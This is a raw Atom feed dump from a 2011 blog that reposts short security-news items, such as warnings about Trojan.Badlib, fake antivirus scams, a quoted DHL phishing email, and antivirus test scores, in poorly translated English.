Removal Tool</title><content type='html'>The Kaspersky Virus Removal Tool application was designed to be another virus scanner and detection software from Kaspersky. The produst will scan the specified locations for any virus threats and remove them or send to Quarantine folder.&lt;br /&gt;&lt;br /&gt;Kaspersky Virus Removal Tool 2010 is a utility designed to remove all types of threats from computers. Kaspersky Virus Removal Tool 2010 uses the effective detection algorithms realized in Kaspersky Anti-Virus and AVZ.&lt;br /&gt;Kaspersky Virus Removal Tool 2010 does not provide resident protection for your computer. After disinfecting a computer, you are supposed to remove the tool and install a full version of antivirus software. &lt;a href="http://adf.ly/2g264"&gt;Read Full Article&lt;/a&gt; ( Skip Adds )&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/09/kaspersky-removal-tools/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-7476724030972491726?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7476724030972491726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7476724030972491726'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/09/kaspersky-virus-removal-tool.html' title='The Kaspersky Virus Removal Tool'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6344217761352969984</id><published>2011-09-02T14:06:00.000+07:00</published><updated>2011-09-02T14:06:34.148+07:00</updated><title type='text'>Symantec warns of Trojan Badlib</title><content type='html'>This Trojan was a bitch, called Trojan.Badlib. Created to infect computers, when it entered into the computer system so he would react differently. First Trojan.Badlibakan parent tries target computer (C &amp; C), and look what the command will be done. Trojan.Badlib will find a list of IP that are in the main list.&lt;br /&gt;&lt;br /&gt;When the first time the parent computer (C &amp; C) was found and send a reply to his job. Trojan.Badlib will download other malware from multiple places that have been ruled by the C &amp; C, and sends the digital signature to ensure the file is retrieved it is true according to his duty.&lt;br /&gt;&lt;br /&gt;According to Symantec, Trojan.Badlib attract at least three other trojans is Trojan.Badfaker, Trojan.Badminer, and Infostealer.Badface.&lt;br /&gt;&lt;br /&gt;What are the jobs to the 3 trojans taken by Trojan.Badlib&lt;br /&gt;&lt;br /&gt;Trojan.Badfaker have to shut down antivirus functions can already infiltrated inside the computer. This Trojan will change the boot the computer into Safe Mode when the computer began to start.&lt;br /&gt;&lt;br /&gt;Then delete the files associated with antivirus and antivirus to make it look to duplicate the icon on the computer screen. As if computer owners will still see that the antivirus is still running. Though already been modified by Trojan.Badfaker. Another task is to turn off the firewall and the warnings from the Microsoft Security Center. At the end of the story, this trojan will display false warnings in Russian and English. .. &lt;a href="http://www.thatcoin.com/2011/08/beware-trojan-badlib/"&gt;Continue reading&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/08/beware-trojan-badlib/"&gt;Thatcoin&lt;/a&gt; ]&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6344217761352969984?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6344217761352969984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6344217761352969984'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/09/symantec-warns-of-trojan-badlib.html' title='Symantec warns of Trojan Badlib'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2452597770167609170</id><published>2011-08-24T05:36:00.000+07:00</published><updated>2011-08-24T05:36:09.628+07:00</updated><title type='text'>How to Upgrade Backtrack 5</title><content type='html'>After BackTrack 5 R1 released, BackTrack is time to upgrade from 5. by using a short python script, we can already use BackTrack 5 R1 without having to re-download.&lt;br /&gt;&lt;a href="http://adf.ly/2R0El"&gt;..Continue Reading&lt;/a&gt; ( Skip Ads )&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/08/upgrade-backtrack-5-to-backtrack-5-r1/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2452597770167609170?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2452597770167609170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2452597770167609170'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/08/how-to-upgrade-backtrack-5.html' title='How to Upgrade Backtrack 5'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6812329899240259320</id><published>2011-08-23T14:29:00.000+07:00</published><updated>2011-08-23T14:29:16.740+07:00</updated><title type='text'>Fake CCleaner</title><content type='html'>Now the official software used deceptive means to ask for money to register the software.&lt;br /&gt;&lt;br /&gt;CCleaner is a free utility, and charged $ 24.95 for full version or premium. This software is used as a means of cheating by asking for cheaper registration costs $ 5. Ccsetup303.exe file is a fake software, will ask for registration fee to activate.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://adf.ly/2QcHO"&gt;Continue Reading&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/08/beware-fake-ccleaner/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6812329899240259320?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6812329899240259320'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6812329899240259320'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/08/fake-ccleaner.html' title='Fake CCleaner'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5067161880055241893</id><published>2011-08-08T21:37:00.000+07:00</published><updated>2011-08-08T21:37:53.981+07:00</updated><title type='text'>Malware Spread Via Internet</title><content type='html'>Engineers from the company Google found about 1 million computers attacked by Search Hijack. When looking for data on the internet, the browser will be directed by malware is lurking. This type of attack has occurred approximately 1 year.&lt;br /&gt;&lt;br /&gt;Google today added another layer of protection from searches on Google.com. Then give a warning to the owner of the computer at Google.com page, that the computer contained malware.&lt;br /&gt;&lt;br /&gt;Finding it may be easier, but more difficult to clean. Computer users should always update your antivirus and clean the computer if already infected.&lt;br /&gt;&lt;br /&gt;Generally links are hijacked by malware will be thrown back to specific sites such as porn sites, fake antivirus, other malware and other sites.&lt;br /&gt;Google can only help to inform the user’s computer from the Google.com page. The rest handed over ownership to clean up computer&lt;br /&gt;&lt;br /&gt;{ &lt;a href="http://www.thatcoin.com/2011/08/internet-malwares/"&gt;Thatcoin.com &lt;/a&gt;]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5067161880055241893?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5067161880055241893'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5067161880055241893'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/08/malware-spread-via-internet.html' title='Malware Spread Via Internet'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5616132539298379679</id><published>2011-06-18T20:45:00.000+07:00</published><updated>2011-06-18T20:45:54.073+07:00</updated><title type='text'>Be carefull Fake Antivirus on Firefox</title><content type='html'>For Firefox browser users be careful when you get a message on the browser. That your computer system needs to be updated. Of special interest to the layman with a computer to see updates and direct click.&lt;br /&gt;Microsoft software update usually comes from the Internet Explorer browser and not from outside Microsoft’s software.&lt;br /&gt;&lt;br /&gt;Display the Microsoft website was created as closely as possible to fool a lot of casualties.&lt;br /&gt;&lt;br /&gt;Files that are downloaded at 2.8MB is malware that will infect your computer. Be careful, do not get stuck this new technique&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/06/firefox-malware/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5616132539298379679?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5616132539298379679'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5616132539298379679'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/06/be-carefull-fake-antivirus-on-firefox.html' title='Be carefull Fake Antivirus on Firefox'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-446293632459981993</id><published>2011-06-12T19:09:00.000+07:00</published><updated>2011-06-12T19:09:42.467+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Fake Antivirus on Facebook</title><content type='html'>Fake antivirus is still the target to the user facebook. To be directed to a specific site and download a fake antivirus.&lt;br /&gt;&lt;br /&gt;The subject is made interesting emails like “IMF boss Dominique Strauss-Kahn Exclusive Rape Videos – Black lady under attack!”dab “oh shit, one more really Freaky video O_O”. And much more fake links that trap.&lt;br /&gt;Some links will link to another site that is Newtubes.in. Last name not be placed at sites in India, but the server is located in the state of Lithuania.&lt;br /&gt;&lt;br /&gt;If you want to view streaming video content with the name of the Youtube site. We recommend that you check the link given before becoming a victim of fraudsters on the internet.&lt;br /&gt;&lt;br /&gt;When this target is not the dominance of anti-counterfeit computer users of Windows OS, but Apple’s Mac becomes a target.&lt;br /&gt;&lt;br /&gt;Researcher’s security said in the 16 hours of the attack. Up notable to block dangerous links and keep spreading. Though the name of the topic or subject of the link has not changed, and continues to appear on Facebook pages.&lt;br /&gt;&lt;br /&gt;Better be careful, before you bothered because one click and fake antivirus warning appears on the screen of your computer.&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/06/malware-links/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-446293632459981993?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/446293632459981993'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/446293632459981993'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/06/fake-antivirus-on-facebook.html' title='Fake Antivirus on Facebook'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1769946561535986785</id><published>2011-05-17T16:46:00.002+07:00</published><updated>2011-05-17T16:46:42.396+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>Malware Attacking Windows 7</title><content type='html'>Microsoft reported attacks in Windows 7 from Malware attacksrose 30% in 2010.Sedangkan Windows XP down 20%.&lt;br /&gt;Computer with Windows 7 32bit, on average there are 4 of 1000computers infected with malware. While the lower 64 bit OS to 2.5per 1000 computers in 2010. From 3 OS which is owned byMicrosoft, only Windows XP has decreased attacks.&lt;br /&gt;&lt;br /&gt;The new report obtained from the use of software Malicious Software Removal Tool (MSRT), which provided free by Microsoftto check to see computers against viruses, fake antivirus, trojans and other malware.&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/05/windows-7-malware/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1769946561535986785?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1769946561535986785'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1769946561535986785'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/05/malware-attacking-windows-7.html' title='Malware Attacking Windows 7'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2344394390214068624</id><published>2011-05-10T18:15:00.000+07:00</published><updated>2011-05-10T18:15:50.475+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>Beware Facebook Malware</title><content type='html'>Fortinet mention the 2 variants of malware attacking up. Deceive with words your password has been reset, and a file was taken via email with your new password is in the file.&lt;br /&gt;&lt;br /&gt;Malicious files in email is a file botnet. When the infected computer will become slaves botnet controlled by a central computer and other. Malware software works silently in the background or without being noticed by the owner of the computer. Be careful when you receive an email with a file attachment.&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/05/new-facebook-malware/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2344394390214068624?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2344394390214068624'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2344394390214068624'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/05/beware-facebook-malware.html' title='Beware Facebook Malware'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3231879856565297905</id><published>2011-05-03T18:34:00.000+07:00</published><updated>2011-05-03T18:34:16.378+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows 7'/><title type='text'>Antivirus for Windows 7</title><content type='html'>AVtest publishing capabilities Antivirus product. Test carried out for Windows 7 in the first quarter of this year. &lt;br /&gt;&lt;br /&gt;Below is a list of antivirus software that passes the test with Windows 7 &lt;br /&gt;&lt;br /&gt;Avast: Free AntiVirus 5.0 and 6.0&lt;br /&gt;AVG: Internet Security 10.0&lt;br /&gt;Avira: Premium Security Suite 10.0&lt;br /&gt;BitDefender: Internet Security Suite 2011&lt;br /&gt;BullGuard: Internet Security 10.0&lt;br /&gt;Eset: Smart Security 4.2&lt;br /&gt;F-Secure: Internet Security 2011&lt;br /&gt;G Data Internet Security 2011&lt;br /&gt;Kaspersky: Internet Security 2011&lt;br /&gt;Microsoft: Security Essentials 2.0&lt;br /&gt;MicroWorld: eScan Internet Security Suite 11.0&lt;br /&gt;Panda: Internet Security 2011&lt;br /&gt;Sophos: Endpoint Security and Control 9.5&lt;br /&gt;Sunbelt: VIPRE Antivirus Premium 4.0&lt;br /&gt;Symantec: Norton Internet Security 2011&lt;br /&gt;Trend Micro: Titanium Internet Security 2011&lt;br /&gt;Webroot: Complete Internet Security 7.0 &lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;BitDefender, F-Secure and Symantec entered score Top 15&lt;br /&gt;G Data, Kaspersky, and Panda get a score of 14&lt;br /&gt;AVG score of 13.5&lt;br /&gt;Sophos 13&lt;br /&gt;ESET, Trend Micro, and Webroot, score 12.5&lt;br /&gt;GFI only get 12 score&lt;br /&gt;Avast, Avira, eScan, and Microsoft was awarded a score of 11.5&lt;br /&gt;And BullGuard bottom with a score of 11&lt;br /&gt;&lt;br /&gt;There are 5 who failed the test antivirus test in Windows 7&lt;br /&gt;&lt;br /&gt;CA: Internet Security Suite 2011&lt;br /&gt;Comodo: Premium Internet Security 5.0 and 5.3&lt;br /&gt;McAfee: Total Protection 2011&lt;br /&gt;Norman: Security Suite Pro 8.0&lt;br /&gt;PC Tools: Internet Security 2011 &lt;br /&gt;&lt;br /&gt;The lowest figures are McAfee and Norman, score 8.5. Both have error alerts on specific software.&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/04/avtest-versions-for-windows-7/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3231879856565297905?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3231879856565297905'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3231879856565297905'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/05/antivirus-for-windows-7.html' title='Antivirus for Windows 7'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6055389522859830731</id><published>2011-04-14T22:15:00.000+07:00</published><updated>2011-04-14T22:15:00.624+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Backtrack 5</title><content type='html'>BackTrack 5 will be based on Ubuntu Lucid (10.04 LTS), and will (finally) support both 32 bit and 64 bit architectures.&lt;br /&gt;We will be officially supporting KDE 4, Gnome and Fluxbox while providing users streamlined ISO downloads of each Desktop Environment (DE). Tool integration from our repositories&lt;br /&gt;&lt;br /&gt;will be seamless with all our supported DE’s, including the specific DE menu structure&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/04/backtrack-5/#more-839"&gt;Thatcoin.com &lt;/a&gt;]&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6055389522859830731?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6055389522859830731'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6055389522859830731'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/04/backtrack-5.html' title='Backtrack 5'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3320446449158775767</id><published>2011-04-08T19:55:00.000+07:00</published><updated>2011-04-08T19:55:22.397+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>Kaspersky Virus Removal Tool 2010</title><content type='html'>The Kaspersky Virus Removal Tool application was designed to be another virus scanner and detection software from Kaspersky. The produst will scan the specified locations for any virus threats and remove them or send to Quarantine folder.&lt;br /&gt;&lt;br /&gt;Kaspersky Virus Removal Tool 2010 is a utility designed to remove all types of threats from computers. Kaspersky Virus Removal Tool 2010 uses the effective detection algorithms realized in Kaspersky Anti-Virus and AVZ.&lt;br /&gt;&lt;br /&gt;Kaspersky Virus Removal Tool 2010 does not provide resident protection for your computer. After disinfecting a computer, you are supposed to remove the tool and install a full version of antivirus software.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Advantages:&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Simplified interface.&lt;br /&gt;Can be installed to an infected computer (Safe Mode supported).&lt;br /&gt;Composite scan and disinfection system: signature detection and heuristic analyzer.&lt;br /&gt;Gathering system information and interactive creation of scripts for disinfection.&lt;br /&gt;&lt;br /&gt;General functions:&lt;br /&gt;&lt;br /&gt;Automatic and manual removal of virus, Trojans and worms.&lt;br /&gt;Automatic and manual removal of Spyware and Adware modules.&lt;br /&gt;Automatic and manual removal of all types of rootkits.&lt;br /&gt;Kaspersky Virus Removal Tool 2010 is Freeware.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[&lt;a href="http://www.thatcoin.com/2011/02/kaspersky-virus-removal-tool-2011/#more-577"&gt;Thatcoin.com&lt;/a&gt;]&lt;br /&gt;Download support.kaspersky.com/viruses/avptool2010?level=2&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3320446449158775767?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3320446449158775767'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3320446449158775767'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/04/kaspersky-virus-removal-tool-2010.html' title='Kaspersky Virus Removal Tool 2010'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1591221012614620006</id><published>2011-03-19T14:26:00.000+07:00</published><updated>2011-03-19T14:26:06.162+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Beware Virus Win32 Injector FBK</title><content type='html'>Again DHL International Courier company name used by spammers from Poland&lt;br /&gt;Bringing a Message&lt;br /&gt;Subject of email&lt;br /&gt;Dear customer. DHL notification&lt;br /&gt;&lt;br /&gt;The parcel was send your home address.&lt;br /&gt;&lt;br /&gt;And it will of arrice Within 7 bussness day.&lt;br /&gt;&lt;br /&gt;More information and the tracking number&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;are attached in the document below.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Thank you.&lt;br /&gt;&lt;br /&gt;2011 DHL International GmbH. All rights reserverd.&lt;br /&gt;&lt;br /&gt;With files document.zip, in which there is exe file contains a virus Win32/Injector.FBK.Trojan DHL_notification.exe&lt;br /&gt;[&lt;a href="http://www.thatcoin.com/2011/03/virus-win32-injector-fbk-trojan/#more-721"&gt;Thatcoin.com&lt;/a&gt;]&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1591221012614620006?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1591221012614620006'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1591221012614620006'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/03/beware-virus-win32-injector-fbk.html' title='Beware Virus Win32 Injector FBK'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2559367614796431507</id><published>2011-02-08T15:23:00.000+07:00</published><updated>2011-02-08T15:23:07.791+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Beware Facebook Links contain with Malware</title><content type='html'>One more attacks on up, give a message “hahahh” , do not be clicked&lt;br /&gt;The link is ordered that smuggle malware links. And display a fake screen of another site with the message “Photo has been Moved.”&lt;br /&gt;&lt;br /&gt;When the click on the photos, taken is malware. If the downloaded program is executed, then the browser will at the plow, and can not open facebook and display ads from the manufacturer&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2011/02/be-careful-up-message-hahaah-on-facebook/"&gt;Source and read full article&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2559367614796431507?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2559367614796431507'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2559367614796431507'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/02/beware-facebook-links-contain-with.html' title='Beware Facebook Links contain with Malware'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2361404621005208419</id><published>2010-08-15T21:03:00.000+07:00</published><updated>2010-08-15T21:03:55.604+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Delete and Restore  Files</title><content type='html'>Addition restore deleted files a false moment, FileWing can also delete files permanently. FileWing will find deleted files and displays them. During not overwritten, the file is not a problem to be saved. FileWing can also delete the data completely to overwrite it again.&lt;br /&gt;&lt;b&gt;Tips&lt;/b&gt;&lt;br /&gt;FileWing also able to handle an external drive. Thus, this application is suitable for rescue deleted photos on digital cameras.&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2010/08/how-to-delete-and-restoring-files/"&gt;Source &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2361404621005208419?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2361404621005208419'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2361404621005208419'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/08/delete-and-restore-files.html' title='Delete and Restore  Files'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6399265336842477310</id><published>2010-08-12T18:41:00.000+07:00</published><updated>2010-08-12T18:41:08.591+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Using Facebook Tips</title><content type='html'>Facebook users are easy prey for criminals along with the number of people share information. Every day people put themselves at risk by clicking on an imprudent to invitations sent by friends to join the group or write in their walls.&lt;br /&gt;Think about what you add.&lt;span class="fullpost"&gt;&lt;br /&gt;Receiving a request provided by a new friend asks posting, photo messaging and information about your personal background. Watch your friends list and think back to who is entitled to access your personal stuff.&lt;br /&gt;Check the privacy settings. Facebook recently did the update, set the privacy from scratch can be very meaningful.&lt;br /&gt;&lt;br /&gt;Footwear of being on Facebook. Do share your photos? Stay in 